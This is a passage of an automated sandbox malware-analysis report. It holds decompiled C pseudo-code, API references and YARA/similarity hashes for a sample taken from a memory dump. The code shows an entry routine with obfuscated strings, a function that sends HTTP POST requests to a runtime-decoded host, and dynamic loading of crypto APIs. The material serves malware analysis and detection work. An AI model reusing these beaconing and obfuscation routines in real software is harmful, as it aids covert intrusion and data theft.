                                                                                                                                                                                                0x00afc92f
                                                                                                                                                                                                0x00afc937
                                                                                                                                                                                                0x00afc937
                                                                                                                                                                                                0x00afc93e
                                                                                                                                                                                                0x00afc93e
                                                                                                                                                                                                0x00afc75a
                                                                                                                                                                                                0x00afc75b
                                                                                                                                                                                                0x00afc760
                                                                                                                                                                                                0x00afc766
                                                                                                                                                                                                0x00afc768
                                                                                                                                                                                                0x00afc769
                                                                                                                                                                                                0x00afc76a
                                                                                                                                                                                                0x00afc76f
                                                                                                                                                                                                0x00afc770
                                                                                                                                                                                                0x00afc77a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc785
                                                                                                                                                                                                0x00afc78f
                                                                                                                                                                                                0x00afc799
                                                                                                                                                                                                0x00afc79c
                                                                                                                                                                                                0x00afc7a2
                                                                                                                                                                                                0x00afc7a9
                                                                                                                                                                                                0x00afc7aa
                                                                                                                                                                                                0x00afc7ab
                                                                                                                                                                                                0x00afc7b4
                                                                                                                                                                                                0x00afc7b5
                                                                                                                                                                                                0x00afc7b6
                                                                                                                                                                                                0x00afc7b8
                                                                                                                                                                                                0x00afc7bb
                                                                                                                                                                                                0x00afc7be
                                                                                                                                                                                                0x00afc7c1
                                                                                                                                                                                                0x00afc7c4
                                                                                                                                                                                                0x00afc7d0
                                                                                                                                                                                                0x00afc7f2
                                                                                                                                                                                                0x00afc7fa
                                                                                                                                                                                                0x00afc7fd
                                                                                                                                                                                                0x00afc808
                                                                                                                                                                                                0x00afc808
                                                                                                                                                                                                0x00afc7fa
                                                                                                                                                                                                0x00afc80e
                                                                                                                                                                                                0x00afc817
                                                                                                                                                                                                0x00afc819
                                                                                                                                                                                                0x00afc81a
                                                                                                                                                                                                0x00afc81c
                                                                                                                                                                                                0x00afc81d
                                                                                                                                                                                                0x00afc81e
                                                                                                                                                                                                0x00afc81f
                                                                                                                                                                                                0x00afc823
                                                                                                                                                                                                0x00afc82a
                                                                                                                                                                                                0x00afc82b
                                                                                                                                                                                                0x00afc833
                                                                                                                                                                                                0x00afc8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc839
                                                                                                                                                                                                0x00afc839
                                                                                                                                                                                                0x00afc83b
                                                                                                                                                                                                0x00afc83c
                                                                                                                                                                                                0x00afc841
                                                                                                                                                                                                0x00afc842
                                                                                                                                                                                                0x00afc843
                                                                                                                                                                                                0x00afc844
                                                                                                                                                                                                0x00afc845
                                                                                                                                                                                                0x00afc84b
                                                                                                                                                                                                0x00afc84c
                                                                                                                                                                                                0x00afc851
                                                                                                                                                                                                0x00afc852
                                                                                                                                                                                                0x00afc85a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc870
                                                                                                                                                                                                0x00afc872
                                                                                                                                                                                                0x00afc879
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc88a
                                                                                                                                                                                                0x00afc890
                                                                                                                                                                                                0x00afc898
                                                                                                                                                                                                0x00afc89b
                                                                                                                                                                                                0x00afc8a1
                                                                                                                                                                                                0x00afc8b1
                                                                                                                                                                                                0x00afc8bd
                                                                                                                                                                                                0x00afc8c2
                                                                                                                                                                                                0x00afc8c8
                                                                                                                                                                                                0x00afc8d8
                                                                                                                                                                                                0x00afc8e4
                                                                                                                                                                                                0x00afc8ec
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afc8ec

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 00AFC7C7
                                                                                                                                                                                                • CreateWindowExA.USER32 ref: 00AFC7F2
                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 00AFC7FD
                                                                                                                                                                                                • UnregisterClassA.USER32 ref: 00AFC808
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 00AFC824
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00AFC91D
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                                                                                                                                                                                                • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                                                                                                                                                                                • API String ID: 3082384575-2319545179
                                                                                                                                                                                                • Opcode ID: da8289f534f63865e4c176ea3a4cc858ae2cb9b9c634e6277b0bae4d3ecf4f01
                                                                                                                                                                                                • Instruction ID: 2df8389ffe741310183eace91278b5876be1cb5c2726de8f4547319df6f3cb63
                                                                                                                                                                                                • Opcode Fuzzy Hash: da8289f534f63865e4c176ea3a4cc858ae2cb9b9c634e6277b0bae4d3ecf4f01
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A71487190020DAFEB11CF95DE48EEEBBB9FB59710F200469F605A7290DB70AA04CB64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF5F63, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E00AF85D0();
				_t19 = E00AF97ED( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E00AF8F59();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0xb0e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E00AF95A8(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E00AF85A3( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00B02A93( *0xb0e69c);
						 *_t55 = 0x7c3;
						 *0xb0e684 = E00AFE1FE(0xb0ba20, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E00AF95C2(0xb0ba20);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E00AF85B6();
							_v8 = 0;
							_t37 =  *0xb0e684; // 0x4d3f6c8
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00AF5DE7, 0, 0,  &_v8);
							 *0xb0e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E00AF85B6();
					}
					goto L10;
				}
			}





















                                                                                                                                                                                                0x00af5f63
                                                                                                                                                                                                0x00af5f73
                                                                                                                                                                                                0x00af5f7d
                                                                                                                                                                                                0x00af60b1
                                                                                                                                                                                                0x00af60a4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af60a6
                                                                                                                                                                                                0x00af60b8
                                                                                                                                                                                                0x00af6079
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af6079
                                                                                                                                                                                                0x00af5f83
                                                                                                                                                                                                0x00af5f8b
                                                                                                                                                                                                0x00af5f92
                                                                                                                                                                                                0x00af5f94
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5fa7
                                                                                                                                                                                                0x00af5fa7
                                                                                                                                                                                                0x00af5fad
                                                                                                                                                                                                0x00af5fb3
                                                                                                                                                                                                0x00af5fc3
                                                                                                                                                                                                0x00af5fc8
                                                                                                                                                                                                0x00af5fd0
                                                                                                                                                                                                0x00af5fd8
                                                                                                                                                                                                0x00af5ff4
                                                                                                                                                                                                0x00af5ff9
                                                                                                                                                                                                0x00af5ffc
                                                                                                                                                                                                0x00af5ffe
                                                                                                                                                                                                0x00af6000
                                                                                                                                                                                                0x00af600d
                                                                                                                                                                                                0x00af6016
                                                                                                                                                                                                0x00af601f
                                                                                                                                                                                                0x00af6024
                                                                                                                                                                                                0x00af6025
                                                                                                                                                                                                0x00af6033
                                                                                                                                                                                                0x00af603d
                                                                                                                                                                                                0x00af604e
                                                                                                                                                                                                0x00af6053
                                                                                                                                                                                                0x00af605a
                                                                                                                                                                                                0x00af6061
                                                                                                                                                                                                0x00af6064
                                                                                                                                                                                                0x00af6070
                                                                                                                                                                                                0x00af6071
                                                                                                                                                                                                0x00af607d
                                                                                                                                                                                                0x00af6086
                                                                                                                                                                                                0x00af608a
                                                                                                                                                                                                0x00af6098
                                                                                                                                                                                                0x00af609b
                                                                                                                                                                                                0x00af60a2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af60a2
                                                                                                                                                                                                0x00af6073
                                                                                                                                                                                                0x00af6078
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af5fd8

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00AF5F73
                                                                                                                                                                                                • SetLastError.KERNEL32(000000AA), ref: 00AF60B8
                                                                                                                                                                                                  • Part of subcall function 00AF85D0: HeapCreate.KERNELBASE(00000000,00080000,00000000,00AF5F88), ref: 00AF85D9
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: GetSystemTimeAsFileTime.KERNEL32(?,?,00AF5F90), ref: 00AF97FA
                                                                                                                                                                                                  • Part of subcall function 00AF97ED: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AF981A
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00AF5FAD
                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00AF5FC8
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00AF5FD0
                                                                                                                                                                                                • memset.MSVCRT ref: 00AF5FF4
                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00AF6016
                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00AF6064
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                                                                                                                                                                                • String ID: Hello qqq
                                                                                                                                                                                                • API String ID: 1203100507-3610097158
                                                                                                                                                                                                • Opcode ID: 29c24d65efceb04c48cfef37d382757907e94a34deb8194cc14395cb9ed7d1ff
                                                                                                                                                                                                • Instruction ID: 7b117058ac80979e7adf19b67c22004bb7b3f1b8c6efebf10863ba39ea7edb80
                                                                                                                                                                                                • Opcode Fuzzy Hash: 29c24d65efceb04c48cfef37d382757907e94a34deb8194cc14395cb9ed7d1ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1831D471900109ABDB24AFB1ED49EBE7BB8EF50710F20C529F665C7191EF348A48CB21
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFE6AA, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                			E00AFE6AA(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E00AF95A8(0x85b);
				_v60 = E00AF95A8(0xdc9);
				_v56 = E00AF95A8(0x65d);
				_v52 = E00AF95A8(0xdd3);
				_t105 = E00AF95A8(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E00AFC3BB(_t214));
				_t113 =  *0xb0e6a4; // 0x4d3fc30
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xb0e6a4; // 0x4d3fc30
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xb0e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xb0e6a4; // 0x4d3fc30
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xb0e6a4; // 0x4d3fc30
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xb0e6a4; // 0x4d3fc30
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xb0e6a4; // 0x4d3fc30
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xb0e6a4; // 0x4d3fc30
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E00AF97ED(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xb0e6a4; // 0x4d3fc30
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E00AF97ED(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E00AF95A8(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xb0e6a4; // 0x4d3fc30
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E00AFC3BB(_t217), _a4, _a8);
										E00AF85A3( &_v12);
										if(_a24 != 0) {
											E00AF97ED(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xb0e6a4; // 0x4d3fc30
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00AF972A( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xb0e6a4; // 0x4d3fc30
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xb0e6a4; // 0x4d3fc30
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xb0e6a4; // 0x4d3fc30
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xb0e6a4; // 0x4d3fc30
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xb0e6a4; // 0x4d3fc30
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xb0e6a4; // 0x4d3fc30
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xb0e6a4; // 0x4d3fc30
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xb0e6a4; // 0x4d3fc30
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                                                                                                                                                                                                0x00afe6b3
                                                                                                                                                                                                0x00afe6c5
                                                                                                                                                                                                0x00afe6ce
                                                                                                                                                                                                0x00afe6d8
                                                                                                                                                                                                0x00afe6dc
                                                                                                                                                                                                0x00afe6ed
                                                                                                                                                                                                0x00afe704
                                                                                                                                                                                                0x00afe711
                                                                                                                                                                                                0x00afe71e
                                                                                                                                                                                                0x00afe72b
                                                                                                                                                                                                0x00afe72e
                                                                                                                                                                                                0x00afe733
                                                                                                                                                                                                0x00afe738
                                                                                                                                                                                                0x00afe73a
                                                                                                                                                                                                0x00afe742
                                                                                                                                                                                                0x00afe74d
                                                                                                                                                                                                0x00afe754
                                                                                                                                                                                                0x00afe760
                                                                                                                                                                                                0x00afe763
                                                                                                                                                                                                0x00afe771
                                                                                                                                                                                                0x00afe774
                                                                                                                                                                                                0x00afe77a
                                                                                                                                                                                                0x00afe77b
                                                                                                                                                                                                0x00afe77d
                                                                                                                                                                                                0x00afe786
                                                                                                                                                                                                0x00afe787
                                                                                                                                                                                                0x00afe78c
                                                                                                                                                                                                0x00afe792
                                                                                                                                                                                                0x00afe79c
                                                                                                                                                                                                0x00afe79e
                                                                                                                                                                                                0x00afe7a3
                                                                                                                                                                                                0x00afe7a3
                                                                                                                                                                                                0x00afe7b2
                                                                                                                                                                                                0x00afe7c1
                                                                                                                                                                                                0x00afe7c5
                                                                                                                                                                                                0x00afe7d4
                                                                                                                                                                                                0x00afe7d7
                                                                                                                                                                                                0x00afe7dc
                                                                                                                                                                                                0x00afe7e0
                                                                                                                                                                                                0x00afe7e7
                                                                                                                                                                                                0x00afe7ee
                                                                                                                                                                                                0x00afe7f6
                                                                                                                                                                                                0x00afe7fe
                                                                                                                                                                                                0x00afe805
                                                                                                                                                                                                0x00afe80d
                                                                                                                                                                                                0x00afe815
                                                                                                                                                                                                0x00afe81c
                                                                                                                                                                                                0x00afe824
                                                                                                                                                                                                0x00afe82c
                                                                                                                                                                                                0x00afe841
                                                                                                                                                                                                0x00afe84e
                                                                                                                                                                                                0x00afe850
                                                                                                                                                                                                0x00afe855
                                                                                                                                                                                                0x00afe855
                                                                                                                                                                                                0x00afe85c
                                                                                                                                                                                                0x00afe86d
                                                                                                                                                                                                0x00afe872
                                                                                                                                                                                                0x00afe874
                                                                                                                                                                                                0x00afe874
                                                                                                                                                                                                0x00afe888
                                                                                                                                                                                                0x00afe89a
                                                                                                                                                                                                0x00afe89c
                                                                                                                                                                                                0x00afe89f
                                                                                                                                                                                                0x00afe8a4
                                                                                                                                                                                                0x00afe8a4
                                                                                                                                                                                                0x00afe8ab
                                                                                                                                                                                                0x00afe8ba
                                                                                                                                                                                                0x00afe8be
                                                                                                                                                                                                0x00afe8fc
                                                                                                                                                                                                0x00afe901
                                                                                                                                                                                                0x00afe909
                                                                                                                                                                                                0x00afe90e
                                                                                                                                                                                                0x00afe919
                                                                                                                                                                                                0x00afe91f
                                                                                                                                                                                                0x00afe929
                                                                                                                                                                                                0x00afe92c
                                                                                                                                                                                                0x00afe935
                                                                                                                                                                                                0x00afe93a
                                                                                                                                                                                                0x00afe93a
                                                                                                                                                                                                0x00afe943
                                                                                                                                                                                                0x00afe98c
                                                                                                                                                                                                0x00afe98e
                                                                                                                                                                                                0x00afe995
                                                                                                                                                                                                0x00afe996
                                                                                                                                                                                                0x00afe999
                                                                                                                                                                                                0x00afe99f
                                                                                                                                                                                                0x00afe9a3
                                                                                                                                                                                                0x00afe9a4
                                                                                                                                                                                                0x00afe9a9
                                                                                                                                                                                                0x00afe9ab
                                                                                                                                                                                                0x00afe9b1
                                                                                                                                                                                                0x00afe9c6
                                                                                                                                                                                                0x00afe9ce
                                                                                                                                                                                                0x00afea03
                                                                                                                                                                                                0x00afea08
                                                                                                                                                                                                0x00afea0d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afea0f
                                                                                                                                                                                                0x00afe9d0
                                                                                                                                                                                                0x00afe9d2
                                                                                                                                                                                                0x00afe9d2
                                                                                                                                                                                                0x00afe9db
                                                                                                                                                                                                0x00afe9de
                                                                                                                                                                                                0x00afe9e0
                                                                                                                                                                                                0x00afe9e2
                                                                                                                                                                                                0x00afe9e8
                                                                                                                                                                                                0x00afe9e8
                                                                                                                                                                                                0x00afe9ed
                                                                                                                                                                                                0x00afe9ef
                                                                                                                                                                                                0x00afe9f6
                                                                                                                                                                                                0x00afe9f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe9f9
                                                                                                                                                                                                0x00afe9b3
                                                                                                                                                                                                0x00afe9bb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe945
                                                                                                                                                                                                0x00afe945
                                                                                                                                                                                                0x00afe94b
                                                                                                                                                                                                0x00afe951
                                                                                                                                                                                                0x00afe954
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe954
                                                                                                                                                                                                0x00afe943
                                                                                                                                                                                                0x00afe8c0
                                                                                                                                                                                                0x00afe8c6
                                                                                                                                                                                                0x00afe8ca
                                                                                                                                                                                                0x00afe8cb
                                                                                                                                                                                                0x00afe8d0
                                                                                                                                                                                                0x00afe8d2
                                                                                                                                                                                                0x00afe8d8
                                                                                                                                                                                                0x00afe8f6
                                                                                                                                                                                                0x00afe8f6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe8f6
                                                                                                                                                                                                0x00afe8da
                                                                                                                                                                                                0x00afe8e4
                                                                                                                                                                                                0x00afe8e6
                                                                                                                                                                                                0x00afe8e7
                                                                                                                                                                                                0x00afe8ec
                                                                                                                                                                                                0x00afe8ee
                                                                                                                                                                                                0x00afe8f4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe8ad
                                                                                                                                                                                                0x00afe8ad
                                                                                                                                                                                                0x00afe956
                                                                                                                                                                                                0x00afe956
                                                                                                                                                                                                0x00afe95c
                                                                                                                                                                                                0x00afe95f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe95f
                                                                                                                                                                                                0x00afe85e
                                                                                                                                                                                                0x00afe85e
                                                                                                                                                                                                0x00afe961
                                                                                                                                                                                                0x00afe961
                                                                                                                                                                                                0x00afe967
                                                                                                                                                                                                0x00afe96a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe96a
                                                                                                                                                                                                0x00afe85c
                                                                                                                                                                                                0x00afe7c7
                                                                                                                                                                                                0x00afe96c
                                                                                                                                                                                                0x00afe96f
                                                                                                                                                                                                0x00afe971
                                                                                                                                                                                                0x00afe974
                                                                                                                                                                                                0x00afe977
                                                                                                                                                                                                0x00afe980
                                                                                                                                                                                                0x00afe985
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe989
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afe989
                                                                                                                                                                                                0x00afe796
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memset$ErrorLast
                                                                                                                                                                                                • String ID: POST
                                                                                                                                                                                                • API String ID: 2570506013-1814004025
                                                                                                                                                                                                • Opcode ID: f5bb8848fbc0d9638fced08aae5dab1702d292cbf7d036199f8fbade9779a510
                                                                                                                                                                                                • Instruction ID: 70ddc5dbbbab7b545301141e193298827fd2b5885976a5f59dcf2e5d0d58d02c
                                                                                                                                                                                                • Opcode Fuzzy Hash: f5bb8848fbc0d9638fced08aae5dab1702d292cbf7d036199f8fbade9779a510
                                                                                                                                                                                                • Instruction Fuzzy Hash: 16B13EB1900218AFDB15DFD4DD88AAEBBB8EF58310F104469F615EB2A0DB749A44CF61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00B016F0, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 28%
                                                                                                                                                                                                			E00B016F0(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                                                                                                                                                                                                0x00b016f9
                                                                                                                                                                                                0x00b01700
                                                                                                                                                                                                0x00b01709
                                                                                                                                                                                                0x00b0170d
                                                                                                                                                                                                0x00b01788
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0178a
                                                                                                                                                                                                0x00b0171b
                                                                                                                                                                                                0x00b0171d
                                                                                                                                                                                                0x00b01722
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0172a
                                                                                                                                                                                                0x00b0172c
                                                                                                                                                                                                0x00b01731
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b0173b
                                                                                                                                                                                                0x00b0173f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00b01741
                                                                                                                                                                                                0x00b01746
                                                                                                                                                                                                0x00b01748
